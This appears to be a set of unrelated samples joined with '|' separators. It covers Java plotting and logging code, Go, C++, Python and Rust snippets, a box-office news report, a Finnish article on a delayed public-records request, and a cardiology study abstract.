Collections.sort(artifactIds);
return artifactIds;
}
} |
/**
* This class is designed to hold the data to be plotted.
* It is to be used in conjunction with the Graph2D class and Axis
* class for plotting 2D graphs.
*
* @version $Revision: 1.4 $, $Date: 2006/01/19 14:45:51 $
* @author Leigh Brookshaw
*/
public class DataSet extends Object {
/*
***************************
** Public Static Values
**************************/
/**
* A constant value flag used to specify no straight line segment
* is to join the data points
*/
public final static int NOLINE = 0;
/**
* A constant value flag used to specify that a straight line segment
* is to join the data points.
*/
public final static int LINE = 1;
/* public static boolean macosx = false;
static {
String osName = System.getProperty("os.name");
if (osName.toLowerCase().startsWith("mac os x"))
macosx = true;
}*/
/*
***********************
** Public Variables
**********************/
/**
* The Graphics canvas that is driving the whole show.
* @see it.unitn.ing.jgraph.Graph2D
*/
public Graph2D g2d;
/**
* The linestyle to employ when joining the data points with
* straight line segments. Currently only solid and no line
* are supported.
*/
public int linestyle = LINE;
/**
* The color of the straight line segments
*/
public Color linecolor = null;
/**
* The index of the marker to use at the data points.
* @see it.unitn.ing.jgraph.Markers
*/
public int marker = 0;
/**
* The marker color
*/
public Color markercolor = null;
/**
* The scaling factor for the marker. Default value is 1.
*/
public double markerscale = 1.0;
/**
* The Axis object the X data is attached to. From the Axis object
* the scaling for the data can be derived.
* @see it.unitn.ing.jgraph.Axis
*/
public Axis xaxis;
/**
* The Axis object the Y data is attached to.
* @see it.unitn.ing.jgraph.Axis
*/
public Axis yaxis;
/**
* The current plottable X maximum of the data.
* This can be very different from
* true data X maximum. The data is clipped when plotted.
*/
public double xmax;
/**
* The current plottable X minimum of the data.
* This can be very different from
* true data X minimum. The data is clipped when plotted.
*/
public double xmin;
/**
* The current plottable Y maximum of the data.
* This can be very different from
* true data Y maximum. The data is clipped when plotted.
*/
public double ymax;
/**
* The current plottable Y minimum of the data.
* This can be very different from
* true data Y minimum. The data is clipped when plotted.
*/
public double ymin;
/**
* Boolean to control clipping of the data window.
* Default value is <em>true</em>, clip the data window.
*/
public boolean clipping = true;
/*
*********************
** Protected Variables
**********************/
/**
* The data X maximum.
* Once the data is loaded this will never change.
*/
protected double dxmax;
/**
* The data X minimum.
* Once the data is loaded this will never change.
*/
protected double dxmin;
/**
* The data Y maximum.
* Once the data is loaded this will never change.
*/
protected double dymax;
/**
* The data Y minimum.
* Once the data is loaded this will never change.
*/
protected double dymin;
/**
* The array containing the actual data
*/
protected double data[];
/**
* The color map containing the actual data colors
*/
protected ThermalColorMap color_map = null;
protected double color_data[];
/**
* The number of data points stored in the data array
*/
protected int length;
/**
* The X range of the clipped data
*/
protected double xrange;
/**
* The Y range of the clipped data
*/
protected double yrange;
/**
* The length of the example line in the data legend.
*/
protected int legend_length = 20;
/**
* The legend text
*/
protected TextLine legend_text = null;
/**
* The X pixel position of the data legend
*/
protected int legend_ix;
/**
* The Y pixel position of the data legend
*/
protected int legend_iy;
/**
* The X data position of the data legend
*/
protected double legend_dx;
/**
* The Y data position of the data legend
*/
protected double legend_dy;
/**
* The amount to increment the data array when the append method is being
* used.
*/
protected int increment = 100;
/**
* The stride of the data. For data pairs (x,y) the stride is 2
*/
protected int stride = 2;
/*
*********************
** Constructors
********************/
/**
* Instantiate an empty data set.
*/
public DataSet() {
length = 0;
range(stride);
}
/**
* Instantiate an empty data set.
* @param stride the stride of the data set. The default stride is 2.
*/
public DataSet(int stride) throws Exception {
if (stride < 2)
throw
new Exception("Invalid stride parameter!");
this.stride = stride;
length = 0;
range(stride);
}
/**
* Instantiate a DataSet with the parsed data. Default stride is 2.
* The double array contains the data. The X data is expected in
* the even indices, the y data in the odd. The integer n is the
* number of data Points. This means that the length of the data
* array is 2*n.
* @param d Array containing the (x,y) data pairs.
* @param n Number of (x,y) data pairs in the array.
* @exception Exception
* A Generic exception if it fails to load the
* parsed array into the class.
*/
public DataSet(double d[], int n) throws Exception {
int i;
int k = 0;
length = 0;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in parsed data!");
}
// Copy the data locally.
data = new double[n * stride];
length = n * stride;
System.arraycopy(d, 0, data, 0, length);
// Calculate the data range.
range(stride);
}
/**
* Instantiate a DataSet with the parsed data.
* The double array contains the data. The X data is expected to be in
* indices i*stride where i=0,1,... The Y data is expected to be found
* in indices i*stride+1 where i=0,1,2...
* The integer n is the
* number of data Points. This means that the length of the data
* array is 2*stride.
* @param d Array containing the (x,y) data pairs.
* @param n Number of (x,y) data pairs in the array.
* @param s The stride of the data.
* @exception Exception
* A Generic exception if it fails to load the
* parsed array into the class.
*/
public DataSet(double d[], int n, int s) throws Exception {
if (s < 2)
throw
new Exception("Invalid stride parameter!");
int i;
int k = 0;
length = 0;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in parsed data!");
}
this.stride = s;
// Copy the data locally.
data = new double[n * stride];
length = n * stride;
System.arraycopy(d, 0, data, 0, length);
// Calculate the data range.
range(stride);
}
/*
*******************
** Public Methods
******************/
/**
* Append data to the data set.
* @param d Array containing (x,y) pairs to append
* @param n Number of (x,y) data pairs in the array.
* @exception Exception
* A generic exception if it fails to load the
* parsed array into the class.
*/
public void append(double d[], int n) throws Exception {
int i;
int k = 0;
double tmp[];
int ln = n * stride;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in append data!");
}
if (data == null) data = new double[increment];
// Copy the data locally.
if (ln + length < data.length) {
System.arraycopy(d, 0, data, length, ln);
length += ln;
} else {
tmp = new double[ln + length + increment];
if (length != 0) {
System.arraycopy(data, 0, tmp, 0, length);
}
System.arraycopy(d, 0, tmp, length, ln);
length += ln;
data = tmp;
}
// Calculate the data range.
range(stride);
// Update the range on Axis that this data is attached to
if (xaxis != null) xaxis.resetRange();
if (yaxis != null) yaxis.resetRange();
}
public void setColorMap(ThermalColorMap map) {
color_map = map;
}
public void setColorData(double[] colors) {
color_data = colors;
}
/**
* Delete data from the data set (start and end are inclusive).
* The first (x,y) pair in the data set start at index 0.
* @param start The start (x,y) pair index.
* @param end The end (x,y) pair index.
*/
public void delete(int start, int end) {
int End = stride * end;
int Start = stride * start;
if (length <= 0) return;
if (End < Start) return;
if (Start < 0) Start = 0;
if (End > length - stride) End = length - stride;
if (End < length - stride) {
System.arraycopy(data, End + stride,
data, Start, length - End - stride);
}
length -= End + stride - Start;
// Calculate the data range.
range(stride);
}
/**
* Delete all the data from the data set.
*/
public void deleteData() {
length = 0;
data = null;
range(stride);
}
/**
* Draw the straight line segments and/or the markers at the
* data points.
* If this data has been attached to an Axis then scale the data
* based on the axis maximum/minimum otherwise scale using
* the data's maximum/minimum
* @param g Graphics state
* @param bounds The data window to draw into
*/
public void draw_data(Graphics g, Rectangle bounds) {
Color c;
if (xaxis != null) {
xmax = xaxis.getMaximum();
xmin = xaxis.getMinimum();
}
if (yaxis != null) {
ymax = yaxis.getMaximum();
ymin = yaxis.getMinimum();
}
xrange = xmax - xmin;
yrange = ymax - ymin;
/*
** draw the legend before we clip the data window
*/
if (clipping) { // && !macosx) {
Shape actualclip = g.getClip();
g.setClip(0, bounds.y, bounds.x, bounds.height);
draw_legend(g, bounds);
g.setClip(actualclip);
} else
draw_legend(g, bounds);
/*
** Clip the data window
*/
if (clipping)
g.clipRect(bounds.x, bounds.y, bounds.width, bounds.height);
c = g.getColor();
if (linestyle != DataSet.NOLINE) {
if (linecolor != null)
g.setColor(linecolor);
else
g.setColor(c);
draw_lines(g, bounds);
}
if (marker > 0) {
if (markercolor != null)
g.setColor(markercolor);
else
g.setColor(c);
draw_markers(g, bounds);
}
g.setColor(c);
}
/**
* return the data X maximum.
*/
public double getXmax() {
return dxmax;
}
/**
* return the data X minimum.
*/
public double getXmin() {
return dxmin;
}
/**
* return the data Y maximum.
*/
public double getYmax() {
return dymax;
}
/**
* return the data Y minimum.
*/
public double getYmin() {
return dymin;
}
/**
* Define a data legend in the graph window
* @param x pixel position of the legend.
* @param y pixel position of the legend.
* @param text text to display in the legend
*/
public void legend(int x, int y, String text) {
if (text == null) {
legend_text = null;
return;
}
if (legend_text == null)
legend_text = new TextLine(text);
else
legend_text.setText(text);
legend_text.setJustification(TextLine.LEFT);
legend_ix = x;
legend_iy = y;
legend_dx = 0.0;
legend_dy = 0.0;
}
/**
* Define a data legend in the graph window
* @param x data position of the legend.
* @param y data position of the legend.
* @param text text to display in the legend
*/
public void legend(double x, double y, String text) {
if (text == null) {
legend_text = null;
return;
}
if (legend_text == null)
legend_text = new TextLine(text);
else
legend_text.setText(text);
legend_text.setJustification(TextLine.LEFT);
legend_dx = x;
legend_dy = y;
legend_ix = 0;
legend_iy = 0;
}
/**
* Set the font to be used in the legend
* @param f font
*/
public void legendFont(Font f) {
if (f == null) return;
if (legend_text == null) legend_text = new TextLine();
legend_text.setFont(f);
}
/**
* Set the color for the legend text
* @param c color
*/
public void legendColor(Color c) {
if (c == null) return;
if (legend_text == null) legend_text = new TextLine();
legend_text.setColor(c);
}
/**
* Return the number of data points in the DataSet
* @return number of (x,y0 points.
*/
public int dataPoints() {
return length / stride;
}
/**
* get the data point at the parsed index. The first (x,y) pair
* is at index 0.
* @param index Data point index
* @return array containing the (x,y) pair.
*/
public double[] getPoint(int index) {
double point[] = new double[stride];
int i = index * stride;
if (index < 0 || i > length - stride) return null;
for (int j = 0; j < stride; j++) point[j] = data[i + j];
return point;
}
/**
* Return the data point that is closest to the parsed (x,y) position
* @param x
* @param y (x,y) position in data space.
* @return array containing the closest data point.
*/
public double[] getClosestPoint(double x, double y) {
double point[] = {0.0, 0.0, 0.0};
int i;
double xdiff, ydiff, dist2;
xdiff = data[0] - x;
ydiff = data[1] - y;
point[0] = data[0];
point[1] = data[1];
point[2] = xdiff * xdiff + ydiff * ydiff;
for (i = stride; i < length - 1; i += stride) {
xdiff = data[i] - x;
ydiff = data[i + 1] - y;
dist2 = xdiff * xdiff + ydiff * ydiff;
if (dist2 < point[2]) {
point[0] = data[i];
point[1] = data[i + 1];
point[2] = dist2;
}
}
//System.out.println("DataSet: closestpoint "+point[0]+", "+point[1]+", "+point[2]);
return point;
}
public double[] getClosestPoint(double x) {
double point[] = {0.0, 0.0, 0.0};
int i;
double xdiff, ydiff, dist2;
xdiff = data[0] - x;
point[0] = data[0];
point[1] = data[1];
point[2] = xdiff * xdiff;
for (i = stride; i < length - 1; i += stride) {
xdiff = data[i] - x;
dist2 = xdiff * xdiff;
if (dist2 < point[2]) {
point[0] = data[i];
point[1] = data[i + 1];
point[2] = dist2;
}
}
//System.out.println("DataSet: closestpoint "+point[0]+", "+point[1]+", "+point[2]);
return point;
}
/*
*********************
** Protected Methods
*********************/
/**
* Draw into the data window the straight line segments joining the
* data points.
* @param g Graphics context
* @param w Data window
*/
protected void draw_lines(Graphics g, Rectangle w) {
int i;
int j;
boolean inside0 = false;
boolean inside1 = false;
double x,y;
int x0 = 0 , y0 = 0;
int x1 = 0 , y1 = 0;
// Calculate the clipping rectangle
Rectangle clip = g.getClipRect();
int xcmin = clip.x;
int xcmax = clip.x + clip.width;
int ycmin = clip.y;
int ycmax = clip.y + clip.height;
// Is there any data to draw? Sometimes the draw command will
// be called before any data has been placed in the class.
if (data == null || data.length < stride) return;
// System.out.println("Drawing Data Lines!");
// Is the first point inside the drawing region ?
if ((inside0 = inside(data[0], data[1]))) {
x0 = (int) (w.x + ((data[0] - xmin) / xrange) * w.width);
y0 = (int) (w.y + (1.0 - (data[1] - ymin) / yrange) * w.height);
if (x0 < xcmin || x0 > xcmax ||
y0 < ycmin || y0 > ycmax)
inside0 = false;
}
for (i = stride; i < length; i += stride) {
// Is this point inside the drawing region?
inside1 = inside(data[i], data[i + 1]);
// If one point is inside the drawing region calculate the second point
if (inside1 || inside0) {
x1 = (int) (w.x + ((data[i] - xmin) / xrange) * w.width);
y1 = (int) (w.y + (1.0 - (data[i + 1] - ymin) / yrange) * w.height);
if (x1 < xcmin || x1 > xcmax ||
y1 < ycmin || y1 > ycmax)
inside1 = false;
}
// If the second point is inside calculate the first point if it
// was outside
if (!inside0 && inside1) {
x0 = (int) (w.x + ((data[i - stride] - xmin) / xrange) * w.width);
y0 = (int) (w.y + (1.0 - (data[i - stride + 1] - ymin) / yrange) * w.height);
}
// If either point is inside and is a valid data draw the segment
if ((!Double.isNaN(data[i - stride + 1]) && !Double.isNaN(data[i + 1])) && (inside0 || inside1))
g.drawLine(x0, y0, x1, y1);
/*
** The reason for the convolution above is to avoid calculating
** the points over and over. Now just copy the second point to the
** first and grab the next point
*/
inside0 = inside1;
x0 = x1;
y0 = y1;
}
}
/**
* Return true if the point (x,y) is inside the allowed data range.
*/
protected boolean inside(double x, double y) {
if (x >= xmin && x <= xmax &&
y >= ymin && y <= ymax)
return true;
return false;
}
/**
* Draw the markers.
* Only markers inside the specified range will be drawn. Also markers
* close the edge of the clipping region will be clipped.
* @param g Graphics context
* @param w data window
* @see it.unitn.ing.jgraph.Markers
*/
protected void draw_markers(Graphics g, Rectangle w) {
double x1,y1;
int i;
// Calculate the clipping rectangle
Rectangle clip = g.getClipRect();
int xcmin = clip.x;
int xcmax = clip.x + clip.width;
int ycmin = clip.y;
int ycmax = clip.y + clip.height;
/*
** Load the marker specified for this data
*/
Markers m = g2d.getMarkers();
if (m == null) return;
// System.out.println("Drawing Data Markers!");
Color c = null;
if (color_map != null) {
c = g.getColor();
}
for (i = 0; i < length; i += stride) {
if (inside(data[i], data[i + 1])) {
x1 = w.x + ((data[i] - xmin) / xrange) * w.width;
y1 = w.y + (1.0 - (data[i + 1] - ymin) / yrange) * w.height;
if (color_map != null) {
g.setColor(color_map.getColor(color_data[i / 2]));
}
if (x1 >= xcmin && x1 <= xcmax &&
y1 >= ycmin && y1 <= ycmax)
m.draw(g, marker, markerscale, x1, y1);
}
}
if (color_map != null) {
g.setColor(c);
}
}
/**
* Draw a legend for this data set
* @param g Graphics context
* @param w Data Window
*/
protected void draw_legend(Graphics g, Rectangle w) {
Color c = g.getColor();
Markers m = null;
if (legend_text == null) return;
if (legend_text.isNull()) return;
if (legend_dx != 0.0 || legend_ix == 0)
legend_ix = (int) (w.x + ((legend_dx - xmin) / xrange) * w.width);
if (legend_dy != 0.0 || legend_iy == 0)
legend_iy = (int) (w.y + (1.0 - (legend_dy - ymin) / yrange) * w.height);
if (linestyle != DataSet.NOLINE) {
if (linecolor != null) g.setColor(linecolor);
g.drawLine(legend_ix, legend_iy, legend_ix + legend_length, legend_iy);
}
if (marker > 0) {
m = g2d.getMarkers();
if (m != null) {
if (markercolor != null)
g.setColor(markercolor);
else
g.setColor(c);
m.draw(g, marker, 1.0, legend_ix + legend_length / 2, legend_iy);
}
}
legend_text.draw(g,
legend_ix + legend_length + legend_text.charWidth(g, ' '),
legend_iy + legend_text.getAscent(g) / 3);
g.setColor(c);
}
/**
* Calculate the range of the data. This modifies dxmin,dxmax,dymin,dymax
* and xmin,xmax,ymin,ymax
*/
protected void range(int stride) {
int i;
if (length >= stride) {
dxmax = data[0];
dymax = data[1];
dxmin = dxmax;
dymin = dymax;
} else {
dxmin = 0.0;
dxmax = 0.0;
dymin = 0.0;
dymax = 0.0;
}
for (i = stride; i < length; i += stride) {
if (dxmax < data[i]) {
dxmax = data[i];
} else if (dxmin > data[i]) {
dxmin = data[i];
}
if (dymax < data[i + 1]) {
dymax = data[i + 1];
} else if (dymin > data[i + 1]) {
dymin = data[i + 1];
}
}
if (xaxis == null) {
xmin = dxmin;
xmax = dxmax;
}
if (yaxis == null) {
ymin = dymin;
ymax = dymax;
}
}
} |
EXCLUSIVE: Warner Bros./DC’s Justice League made $13M last night per Warner Bros., which is where some of our more aggressive box office analysts saw it. Previews began at 6PM. Last night’s take is higher than the $11M minted by Wonder Woman before earning a $38.2M Friday ($103.3M opening). Based on these estimates, the notion is that Justice League could fly to a $110M-$115M start and a possible $37M-$40M Friday. Already as of Wednesday, Justice League has already collected $8.5M in nine countries, spurred by Brazil, Korea and France. There are 38 more countries opening today.
Recently, Disney/Marvel’s Thor Ragnarok grossed $14.5M off its Thursday night, which repped a little more than a third of its $46.47M Friday before posting a $122.7M three-day. However, critics embraced the Taika Waititi film, giving is one of Marvel’s best reviews ever at 92% certified fresh. Similar to such DC movies as Batman v. Superman: Dawn of Justice (27% Rotten) and Suicide Squad (26% Rotten), critics haven’t been kind to Snyder’s super friends entourage pic, smacking the title with a current 38% Rotten. Wonder Woman’s Thursday night repped about 29% of its Friday, while BvS made $27.7M on its Holy Thursday, which contributed to 34% to its $81.55M Good Friday (opening weekend was $166M).
Justice League‘s Thursday night beats that of Deadpool ($12.7M), Guardians of the Galaxy ($11.2M), and is just $500K shy of what It made for New Line/Warner Bros. on its preview night.
.Lionsgate Lionsgate
Lionsgate’s feature adaptation of the bestselling YA novel Wonder also previewed last night and earned $740k from 2,400 locations that had showtimes starting at 7PM. That movie came was tracking at $9M, moved to $14M and there’s a very good chance it could well outperform. There’s also Sony Affirm’s animated Biblical film The Star which opened at 5PM tonight. That pic is pegged at making $10M.
In estimates this morning, Ragnarok led all films in regular release yesterday with $2.4M for a second week’s take of $70.6M and a two week running cume of $225.6M. This weekend, Ragnarok, will easily eclipse the domestic lifetime cume of last year’s Doctor Strange from Marvel which ended its run at $232.6M. Ragnarok is projected to rake in north of $30M+ this weekend despite Justice League‘s presence in the marketplace.
20th Century Fox’s Murder on the Orient Express drove an estimated $37.9M in its first week with a second place take yesterday of $1.79M. The Kenneth Branagh-directed title is igniting its older female fanbase and is expected to ease 40% in weekend two for $17.1M. Ten-day total by Sunday should be around $55M. Paramount’s Daddy’s Home 2 made $1.16M yesterday for a week’s estimated tally of $35.8M. The PG-13 family comedy is looking at a 45% dip for $16.3M in weekend 2 for a running 10 day total of $52M.
We’ll have more updates for you later. |
def anonymise(pdf_form_data, label_key):
pdf_form_data_removedlabel = copy.deepcopy(pdf_form_data)
pdf_form_data_GENDERlabel = pdf_form_data_removedlabel.pop(label_key, None)
try:
pdf_form_data_GENDERlabel = pdf_form_data_GENDERlabel['/V']
keyvals_removedlabel = [(k, pdf_form_data_removedlabel[k]['/V'])
for k in pdf_form_data_removedlabel.keys()
if '/V' in pdf_form_data_removedlabel[k] and
pdf_form_data_removedlabel[k]['/V'] != '']
return (keyvals_removedlabel, pdf_form_data_GENDERlabel)
except:
print("check this PDF doesn't have a '/V' key for the chosen label") |
/**
* LogFactory to create log4j compatible QF loggers.
*
* @author Neueda
*/
public class LogAdapterFactory implements LogFactory {
private Level level;
public LogAdapterFactory(Level level) {
this.level = level;
}
@Override
public Log create(SessionID sessionID) {
return new LogAdapter(sessionID.toString(), level);
}
} |
// resize handles user screen/window changes.
func (bb *bbtag) resize() {
x, y, width, height := bb.eng.Size()
bb.eng.Resize(x, y, width, height)
bb.scene.SetPerspective(60, float64(width)/float64(height), 0.1, 50)
} |
#include <bits/stdc++.h>
using namespace std;
int q,x,n;
string s,w;
bool d[1000000],kt;
int main() {
ios::sync_with_stdio(false);
cin>>q;
while(q--) {
cin>>s>>x;
n=s.size();
s=' '+s;
w="";
kt=0;
for(int i=1;i<=n;i++) {
w=w+'0';
d[i]=0;
}
w=' '+w;
for(int i=1;i<=n;i++) {
if(s[i]=='0') {
if(i+x<=n) {
if(w[i+x]!='0'&&d[i+x]==1) {
kt=1;break;
}
w[i+x]='0';
d[i+x]=1;
}
if(i-x>0) {
if(w[i-x]!='0'&&d[i-x]==1) {
kt=1;break;
}
w[i-x]='0';
d[i-x]=1;
}
}
else {
if(i-x>0) {
if(d[i-x]==0||w[i-x]=='1') {
d[i-x]=1;
w[i-x]='1';
continue;
}
}
if(i+x>n) {
kt=1;break;
}
if(d[i+x]==1&&w[i+x]!='1') {
kt=1;break;
}
d[i+x]=1;
w[i+x]='1';
}
}
if(kt==1) cout<<"-1\n";
else {
w.erase(0,1);
cout<<w<<'\n';
}
}
}
|
#!/usr/bin/python
import os
import sys
import shutil
import tempfile
import ply.lex
import ply.yacc
tokens = ['token']
t_token = 'x'
def t_error(t):
pass
def p_dummy(p):
'dummy : token'
pass
def p_error(p):
pass
def read_tabversion(filename):
file = open(filename)
data = {}
try:
exec file in data
finally:
file.close()
return data['_tabversion']
tmpdir = tempfile.mkdtemp()
try:
package = sys.argv[1]
except IndexError:
raise RuntimeError, "ERROR: Required the package name as argument"
try:
ply.lex.lex(outputdir=tmpdir, optimize=True)
ply.yacc.yacc(outputdir=tmpdir, optimize=True, debug=False)
lex_tabversion = read_tabversion(os.path.join(tmpdir, 'lextab.py'))
yacc_tabversion = read_tabversion(os.path.join(tmpdir, 'parsetab.py'))
print '%s-lex-%s, %s-yacc-%s' % (package, lex_tabversion, package,
yacc_tabversion)
finally:
shutil.rmtree(tmpdir)
|
def ReadGraph_Flickr(file_address):
start = time.time()
print('Built Flickr graph begining', start, 's')
G = nx.DiGraph()
with open(file_address) as f:
for line in f:
if line[0] != '#':
u, v = list(map(int, line.split(' ')))
try:
G[u][v]['weight'] += 1
except:
G.add_edge(u,v, weight=1)
print('Built Flickr graph G', time.time() - start, 's')
return G |
FAKTA
Oulu-lehti teki keskiviikon lehdessä julkaistua juttua varten tietopyynnön useille Oulussa toimiville oppilaitoksille. Yleisesti tiedot luovutettiin asianmukaisesti, mutta Oulun konservatoriosta todettiin ykskantaan, että tietoja joutuisi odottelemaan viikkoja.
– Olen välittänyt kyselyn opinto-ohjaajalle, joka on jo kesälomilla. Hän palaa lomilta elokuussa ja vastannee sitten kun ehtii, tietopyyntöön vastannut reagoi sähköpostitse pyyntöä seuraavana päivänä.
Lomalta tavoitettu Oulun konservatorion rehtori Eero Liimatainen toistaa vastauksen kannan. Hän korostaa, että konservatoriosta halutaan antaa oikeita tietoja ja että opinto-ohjaajan loman aikana olisi mahdollista luovuttaa vain arvioita.
– Mikä siinä on, että se pitää juuri nyt heinäkuussa saada se tieto? Eikö se voi odottaa elokuulle? rehtori Liimatainen kysyy.
Julkisuuslain mukaan ei voi. Kuntien tietopyyntöongelmia tutkinut Aleksi Koski Jyväskylän yliopistosta toteaa, että annettu selitys on heppoinen.
– Julkisuuslaki ei tunne lomia erityissyynä olla luovuttamatta tietoja. Kyse on virkavelvollisuuden piiriin kuuluvasta hallintotehtävästä – jos sitä ei voida lainmukaisesti tehdä, on toiminta silloin virheellistä.
Koski muistuttaa, että tietojen luovuttaminen on viranomaisen velvollisuus, ei yksittäisen viranhaltijan.
– Jos yksi henkilö on lomilla tai muuten estynyt, niin sitten asia osoitetaan viranomaisen toisen työntekijän hoidettavaksi.
Oulu-lehti korosti konservatorion ensimmäisen vastauksen saatuaan, että kyseessä oli julkisuuslakiin perustuva tietopyyntö ja että esimerkiksi eduskunnan oikeusasiamiehen ratkaisujen valossa resurssipula ei oikeuta viivyttelemään yli laista johtuvien aikarajojen.
– Näin varmaan on, mutta opinto-ohjaaja on lomilla ja hän on ainut henkilö, joka voi vastata kyselyyn, konservatorion vastauksessa todettiin.
Oulun konservatorio kuuluu kaupungin organisaatiossa sivistys- ja kulttuuripalveluihin. Sivistys- ja kulttuurijohtaja Mika Penttilä toteaa tietopyyntöongelmasta kuultuaan, että julkisuuslain näkökulmasta asia on selvä.
– Tapahtunut selvitetään sisäisesti. En minä ala tätä selittelemään parhain päin. Laki ja eduskunnan oikeusasiamiehen ratkaisut ovat kiistattomia, ja niitä me lähtökohtaisesti noudatamme.
Tutkija Aleksi Kosken mukaan laki on tietojen luovuttamisen määräaikojen suhteen on pääpiirteittäin selkeä.
– Jos tietopyyntö on yksinkertainen, kuten esimerkiksi nimetty asiakirja, pitäisi tiedot luovuttaa viivytyksettä. Jos tietoja joutuu vähän kaivelemaan tai on vastaava muu syy, niin kaksi viikkoa on enimmäismääräaika.
Oulun konservatorion rehtori Eero Liimatainen ilmoitti torstaisen haastattelun jälkeen tekstiviestitse, että tiedot toimitettaisiin vielä saman päivän aikana. Näin myös tapahtui. Oulu-lehden tietopyyntö konservatoriolle lähetettiin 29.6. Kaksi viikkoa täyttyi siis keskiviikkona.
Erityisen hankalissa ja työläissä tapauksissa vastausaikaa voi venyttää kuukauden mittaiseksi. Tästä tuskin kuitenkaan voi katsoa olleen kyse Oulu-lehden tietopyynnössä, joka koski muun muassa oppilaitosten kirjoilla olleiden opiskelijoiden lukumääriä ja hakijamääriä. Konservatorion alun perin ilmoittama vastausaika olisi venynyt yli kuukaudenkin määräajasta.
Julkisuuslaki eli laki viranomaisten toiminnan julkisuudesta astui voimaan vuonna 2000. Kunnilla on ollut suuria hankaluuksia sen noudattamisessa.
Kunnallisalan kehittämissäätiö julkaisi viime syksynä Jyväskylän yliopiston tutkijoiden Aleksi Kosken ja Heikki Kuutin asiaa koskeneen laajan tutkimuksen. Tutkijat lähettivät vuonna 2015 tietopyynnön kaikkiin Manner-Suomen kuntiin. Peräti kahdella kolmesta kunnasta oli ongelmia vastata tietopyyntöihin lain edellyttämällä tavalla.
Tuosta tutkimuksesta Oulu selvisi kunnialla. Sivistys- ja kulttuurijohtaja Mika Penttilä sanoo, että julkisuuslakia ja siihen liittyviä ratkaisuja on käyty läpi sisäisissä koulutuksissa.
– Mitään huoneentaulun tapaista ohjeistusta siitä ei kuitenkaan taida olla, hän arvelee
Oulu voi lohduttautua sillä, että loma-aikoihin kytkeytyvien ongelmien kanssa se ei ole yksin.
– Pistimme kuntien tietopyyntöihin vastaamisen ongelmia koskevassa tutkimuksessamme merkille, että monessa kunnassa on ”kesäsulut” pitkän aikaa ja kukaan ei vastaile silloin, vaikka tietopyyntöihin vastaaminen on virkavelvollisuuden piiriin kuuluva hallintotehtävä, Aleksi Koski sanoo. |
Prediction of cardiac events after uncomplicated myocardial infarction: a prospective study comparing predischarge exercise thallium-201 scintigraphy and coronary angiography.
The ability of predischarge quantitative exercise thallium-201 (201T1) scintigraphy to predict future cardiac events was evaluated prospectively in 140 consecutive patients with uncomplicated acute myocardial infarction; the results were compared with those of submaximal exercise treadmill testing and coronary angiography. High risk was assigned if scintigraphy detected 201T1 defects in more than one discrete vascular region, redistribution, or increased lung uptake, if exercise testing caused ST segment depression greater than or equal to 1 mm or angina or if angiography revealed multivessel disease. Low risk was designated if scintigraphy detected a single-region defect, no redistribution, or no increase in lung uptake, if exercise testing caused no ST segment depression or angina, or if angiography revealed single-vessel disease or no disease. By 15 +/- 12 months, 50 patients had experienced a cardiac event; seven died (five suddenly), nine suffered recurrent myocardial infarction, and 34 developed severe class III or IV angina pectoris. Compared with that of patients at low risk, the cumulative probability of a cardiac event was greater in high-risk patients identified by scintigraphy (p less than .001), exercise testing (p = .011), or angiography (p = .007). Scintigraphy predicted low-risk status better than exercise testing (p = .01) or angiography (p = .05). Each predicted mortality with equal accuracy. However, scintigraphy was more sensitive in detecting patients who experienced reinfarction or who developed class III or IV angina. When all 50 patients with events were combined, scintigraphy identified 47 high-risk patients (94%), whereas exercise-induced ST segment depression or angina detected only 28 (56%) (p less than .001). The presence of multivessel disease as assessed by angiography identified nine more patients with events than exercise testing (p = .06). However, the overall sensitivity of angiography was lower than that of scintigraphy (71% vs 94%; p less than .01) because three patients who experienced reinfarction and 10 who developed class III or IV angina had single-vessel disease. Importantly, 12 (92%) of these 13 patients with single-vessel disease who had an event exhibited redistribution on scintigraphy. These results indicate that (1) submaximal exercise 201T1 scintigraphy can distinguish high- and low-risk groups after uncomplicated acute myocardial infarction before hospital discharge; (2) 201T1 defects in more than one discrete vascular region, presence of delayed redistribution, or increased lung thallium uptake are more sensitive predictors of subsequent cardiac events than ST segment depression, angina, or extent of angiographic disease; and (3) low-risk patients are best identified by a single-region 201T1 defect without redistribution and no increased lung uptake. |
#[macro_use]
extern crate lazy_static;
#[macro_use]
extern crate named_type_derive;
#[macro_use]
extern crate derivative;
#[macro_use]
extern crate serde_derive;
#[macro_use]
extern crate serde_json;
extern crate byteorder;
extern crate indyrs as indy;
extern crate indyrs as api;
extern crate ursa;
extern crate uuid;
extern crate named_type;
extern crate rmp_serde;
extern crate rust_base58;
extern crate time;
extern crate serde;
#[macro_use]
mod utils;
use utils::{wallet, did, pool, ledger};
use utils::constants::*;
use utils::types::ResponseType;
use self::indy::ErrorCode;
use api::{INVALID_WALLET_HANDLE, INVALID_POOL_HANDLE};
#[cfg(feature = "local_nodes_pool")]
use std::thread;
pub const ENCRYPTED_MESSAGE: &'static [u8; 45] = &[187, 227, 10, 29, 46, 178, 12, 179, 197, 69, 171, 70, 228, 204, 52, 22, 199, 54, 62, 13, 115, 5, 216, 66, 20, 131, 121, 29, 251, 224, 253, 201, 75, 73, 225, 237, 219, 133, 35, 217, 131, 135, 232, 129, 32];
pub const SIGNATURE: &'static [u8; 64] = &[20, 191, 100, 213, 101, 12, 197, 198, 203, 49, 89, 220, 205, 192, 224, 221, 97, 77, 220, 190, 90, 60, 142, 23, 16, 240, 189, 129, 45, 148, 245, 8, 102, 95, 95, 249, 100, 89, 41, 227, 213, 25, 100, 1, 232, 188, 245, 235, 186, 21, 52, 176, 236, 11, 99, 70, 155, 159, 89, 215, 197, 239, 138, 5];
mod high_cases {
use super::*;
mod key_for_did {
use super::*;
#[test]
fn indy_key_for_did_works_for_my_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_did_works_for_my_did");
let (did, verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
let received_verkey = did::key_for_did(-1, wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_my_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_did_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
let received_verkey = did::key_for_did(-1, wallet_handle, DID).unwrap();
assert_eq!(VERKEY, received_verkey);
